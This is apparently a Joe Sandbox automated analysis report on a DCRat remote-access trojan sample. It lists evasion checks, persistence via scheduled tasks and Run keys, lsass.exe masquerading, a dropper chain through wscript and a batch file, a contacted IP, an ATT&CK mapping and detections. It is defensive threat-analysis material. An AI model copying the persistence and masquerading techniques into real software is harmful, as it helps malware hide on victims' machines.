Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe TID: 6676	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe TID: 6208	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe TID: 1620	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe TID: 3716	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe TID: 5700	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

Code function: 0_2_0101DD72 VirtualQuery,GetSystemInfo,

0_2_0101DD72

Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_0100A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_0100A5F4
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_0101B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_0101B8E0
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_0102AAA8 FindFirstFileExA,	0_2_0102AAA8

Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

API call chain: ExitProcess graph end node

graph_0-23636

Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: lsass.exe, 00000014.00000002.935090036.00000000010A8000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
Source: backgroundTaskHost.exe.7.dr	Binary or memory string: VmCi6Flq3E
Source: refhostperfdllCommonsessionnetsvc.exe, 00000007.00000002.714982029.000000001BA4A000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}[o;o

Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

Code function: 0_2_0102866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0102866F

Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

Code function: 0_2_0102B710 GetProcessHeap,

0_2_0102B710

Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

Code function: 0_2_0102753D mov eax, dword ptr fs:[00000030h]

0_2_0102753D

Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_0101F063 SetUnhandledExceptionFilter,	0_2_0101F063
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_0101F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0101F22B
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_0102866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0102866F
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_0101EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0101EF05

Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\refhostperfdllCommon\mbuli7h5qN.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\refhostperfdllCommon\rSX3yp.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process created: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe "C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe"	Jump to behavior

Source: refhostperfdllCommonsessionnetsvc.exe, 00000007.00000002.713915438.0000000013171000.00000004.00000001.sdmp, wjIuhVBtfHXnMCZlWDoj.exe, 0000000A.00000002.727189288.0000000012551000.00000004.00000001.sdmp, refhostperfdllCommonsessionnetsvc.exe, 0000000D.00000002.732824643.0000000012DE1000.00000004.00000001.sdmp, lsass.exe, 0000000F.00000002.743281064.0000000012CB1000.00000004.00000001.sdmp, wjIuhVBtfHXnMCZlWDoj.exe, 00000012.00000002.753888327.0000000012461000.00000004.00000001.sdmp, lsass.exe, 00000014.00000002.935488926.0000000001B90000.00000002.00020000.sdmp, lsass.exe, 00000014.00000002.935822946.0000000012FB1000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: refhostperfdllCommonsessionnetsvc.exe, 00000007.00000002.713915438.0000000013171000.00000004.00000001.sdmp, wjIuhVBtfHXnMCZlWDoj.exe, 0000000A.00000002.727189288.0000000012551000.00000004.00000001.sdmp, refhostperfdllCommonsessionnetsvc.exe, 0000000D.00000002.732824643.0000000012DE1000.00000004.00000001.sdmp, lsass.exe, 0000000F.00000002.743281064.0000000012CB1000.00000004.00000001.sdmp, wjIuhVBtfHXnMCZlWDoj.exe, 00000012.00000002.753888327.0000000012461000.00000004.00000001.sdmp, lsass.exe, 00000014.00000002.935488926.0000000001B90000.00000002.00020000.sdmp, lsass.exe, 00000014.00000002.935822946.0000000012FB1000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: lsass.exe, 00000014.00000002.935488926.0000000001B90000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: lsass.exe, 00000014.00000002.935488926.0000000001B90000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Queries volume information: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe VolumeInformation	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Queries volume information: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe VolumeInformation	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Queries volume information: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Queries volume information: C:\Users\user\Pictures\Camera Roll\lsass.exe VolumeInformation	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Queries volume information: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Queries volume information: C:\Users\user\Pictures\Camera Roll\lsass.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_0101A63C

Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

Code function: 0_2_0101ED5B cpuid

0_2_0101ED5B

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

Code function: 0_2_0101D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_0101D5D4

Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

Code function: 0_2_0100ACF5 GetVersionExW,

0_2_0100ACF5

Stealing of Sensitive Information:

Yara detected DCRat

Show sources

Source: Yara match	File source: 0000000F.00000002.743281064.0000000012CB1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.753888327.0000000012461000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.727189288.0000000012551000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.935822946.0000000012FB1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.713915438.0000000013171000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.732824643.0000000012DE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: refhostperfdllCommonsessionnetsvc.exe PID: 744, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wjIuhVBtfHXnMCZlWDoj.exe PID: 6632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: refhostperfdllCommonsessionnetsvc.exe PID: 5292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lsass.exe PID: 2936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wjIuhVBtfHXnMCZlWDoj.exe PID: 1744, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lsass.exe PID: 1680, type: MEMORYSTR

Remote Access Functionality:

Yara detected DCRat

Show sources

Source: Yara match	File source: 0000000F.00000002.743281064.0000000012CB1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.753888327.0000000012461000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.727189288.0000000012551000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.935822946.0000000012FB1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.713915438.0000000013171000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.732824643.0000000012DE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: refhostperfdllCommonsessionnetsvc.exe PID: 744, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wjIuhVBtfHXnMCZlWDoj.exe PID: 6632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: refhostperfdllCommonsessionnetsvc.exe PID: 5292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lsass.exe PID: 2936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wjIuhVBtfHXnMCZlWDoj.exe PID: 1744, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lsass.exe PID: 1680, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation11	Scheduled Task/Job1	Process Injection12	Masquerading121	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter2	Registry Run Keys / Startup Folder21	Scheduled Task/Job1	Disable or Modify Tools1	LSASS Memory	Query Registry1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Scheduled Task/Job1	DLL Side-Loading1	Registry Run Keys / Startup Folder21	Virtualization/Sandbox Evasion21	Security Account Manager	Security Software Discovery21	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Scripting11	Logon Script (Mac)	DLL Side-Loading1	Process Injection12	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol11	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	Virtualization/Sandbox Evasion21	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Scripting11	Cached Domain Credentials	File and Directory Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information2	DCSync	System Information Discovery37	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	DLL Side-Loading1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	100%	Avira	HEUR/AGEN.1141820
C:\Users\user\Pictures\Camera Roll\lsass.exe	100%	Avira	HEUR/AGEN.1141820
C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	100%	Avira	HEUR/AGEN.1141820
C:\Windows\System32\umdmxfrm\backgroundTaskHost.exe	100%	Avira	HEUR/AGEN.1141820
C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	100%	Joe Sandbox ML
C:\Users\user\Pictures\Camera Roll\lsass.exe	100%	Joe Sandbox ML
C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	100%	Joe Sandbox ML
C:\Windows\System32\umdmxfrm\backgroundTaskHost.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
10.2.wjIuhVBtfHXnMCZlWDoj.exe.2b0000.0.unpack	100%	Avira	HEUR/AGEN.1141820	Download File
7.2.refhostperfdllCommonsessionnetsvc.exe.da0000.0.unpack	100%	Avira	HEUR/AGEN.1141820	Download File
20.0.lsass.exe.b00000.0.unpack	100%	Avira	HEUR/AGEN.1141820	Download File
20.2.lsass.exe.b00000.0.unpack	100%	Avira	HEUR/AGEN.1141820	Download File
10.0.wjIuhVBtfHXnMCZlWDoj.exe.2b0000.0.unpack	100%	Avira	HEUR/AGEN.1141820	Download File
15.2.lsass.exe.7c0000.0.unpack	100%	Avira	HEUR/AGEN.1141820	Download File
7.0.refhostperfdllCommonsessionnetsvc.exe.da0000.0.unpack	100%	Avira	HEUR/AGEN.1141820	Download File
18.2.wjIuhVBtfHXnMCZlWDoj.exe.30000.0.unpack	100%	Avira	HEUR/AGEN.1141820	Download File
13.2.refhostperfdllCommonsessionnetsvc.exe.980000.0.unpack	100%	Avira	HEUR/AGEN.1141820	Download File
13.0.refhostperfdllCommonsessionnetsvc.exe.980000.0.unpack	100%	Avira	HEUR/AGEN.1141820	Download File
18.0.wjIuhVBtfHXnMCZlWDoj.exe.30000.0.unpack	100%	Avira	HEUR/AGEN.1141820	Download File
13.0.refhostperfdllCommonsessionnetsvc.exe.980000.2.unpack	100%	Avira	HEUR/AGEN.1141820	Download File
13.0.refhostperfdllCommonsessionnetsvc.exe.980000.1.unpack	100%	Avira	HEUR/AGEN.1141820	Download File
15.0.lsass.exe.7c0000.0.unpack	100%	Avira	HEUR/AGEN.1141820	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://47.254.235.229x	0%	Avira URL Cloud	safe
http://47.254.235.229	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://steamcommunity.com/profiles/	lsass.exe, 00000014.00000002.935822946.0000000012FB1000.00000004.00000001.sdmp	false		high
http://47.254.235.229x	lsass.exe, 00000014.00000002.935719787.000000000305C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	refhostperfdllCommonsessionnetsvc.exe, 00000007.00000002.712103997.0000000003250000.00000004.00000001.sdmp, lsass.exe, 00000014.00000002.935719787.000000000305C000.00000004.00000001.sdmp	false		high
http://47.254.235.229	lsass.exe, 00000014.00000002.935719787.000000000305C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
47.254.235.229	unknown	United States		45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	553369
Start date:	14.01.2022
Start time:	19:13:38
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.troj.winEXE@18/12@0/1
EGA Information:	Successful, ratio: 14.3%
HDC Information:	Successful, ratio: 26.1% (good quality ratio 24.4%) Quality average: 77.7% Quality standard deviation: 29.7%
HCA Information:	Successful, ratio: 62% Number of executed functions: 463 Number of non-executed functions: 110
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 51.104.136.2, 40.91.112.76, 20.54.110.249 Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Execution Graph export aborted for target lsass.exe, PID 1680 because it is empty Execution Graph export aborted for target lsass.exe, PID 2936 because it is empty Execution Graph export aborted for target refhostperfdllCommonsessionnetsvc.exe, PID 5292 because it is empty Execution Graph export aborted for target refhostperfdllCommonsessionnetsvc.exe, PID 744 because it is empty Execution Graph export aborted for target wjIuhVBtfHXnMCZlWDoj.exe, PID 1744 because it is empty Execution Graph export aborted for target wjIuhVBtfHXnMCZlWDoj.exe, PID 6632 because it is empty Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:14:52	Task Scheduler	Run new task: wjIuhVBtfHXnMCZlWDoj path: "C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe"
19:14:55	Task Scheduler	Run new task: backgroundTaskHost path: "C:\Windows\System32\umdmxfrm\backgroundTaskHost.exe"
19:14:55	Task Scheduler	Run new task: lsass path: "C:\Documents and Settings\user\Pictures\Camera Roll\lsass.exe"
19:14:57	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run wjIuhVBtfHXnMCZlWDoj "C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe"
19:15:05	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run backgroundTaskHost "C:\Windows\System32\umdmxfrm\backgroundTaskHost.exe"
19:15:13	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run lsass "C:\Documents and Settings\user\Pictures\Camera Roll\lsass.exe"
19:15:25	API Interceptor	1x Sleep call for process: lsass.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	vk8A1dXh5C.exe	Get hash	malicious	Browse	8.209.70.0
	GahImDA8DA.exe	Get hash	malicious	Browse	8.209.70.0
	prkVkqYIwv.exe	Get hash	malicious	Browse	8.209.70.0
	P42zLwaJQk.exe	Get hash	malicious	Browse	8.209.70.0
	9ro85QVN0F.exe	Get hash	malicious	Browse	8.209.70.0
	Mc7TWWp1Vp.exe	Get hash	malicious	Browse	8.209.70.0
	sbxGIUIhRd.exe	Get hash	malicious	Browse	8.209.70.0
	6zsU4O4WHq.exe	Get hash	malicious	Browse	8.209.70.0
	urMpgNNXPM.exe	Get hash	malicious	Browse	8.209.70.0
	zmbGUZTICp.exe	Get hash	malicious	Browse	8.209.70.0
	3RBkU4iBFD.exe	Get hash	malicious	Browse	8.209.78.88
	tijXCZsbGe.exe	Get hash	malicious	Browse	8.209.70.0
	U3E7zMaux2.exe	Get hash	malicious	Browse	8.209.67.104
	0Cjy7Lkv1A.exe	Get hash	malicious	Browse	8.209.67.104
	Setup.exe	Get hash	malicious	Browse	47.52.68.200
	N9fUU4K448	Get hash	malicious	Browse	47.252.147.59
	KV5avML4Qu	Get hash	malicious	Browse	8.222.139.95
	Debbie Young.html	Get hash	malicious	Browse	47.243.67.36
	Jayden Krebs.html	Get hash	malicious	Browse	47.243.67.36
	8EjHURgogb	Get hash	malicious	Browse	47.245.134.80

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Recovery\7ab5b149089621 Download File
Process:	C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	943
Entropy (8bit):	5.913188613052131
Encrypted:	false
SSDEEP:	24:14lWm6wLRjn7hj5F6sXgL9grmqqVRu5IW:148wl5+vgVqVRuH
MD5:	ECF7F945361F7926B9B63C419078DDF4
SHA1:	9ECD8AEAB79A1920442CCB468451A8AB8CA560DE
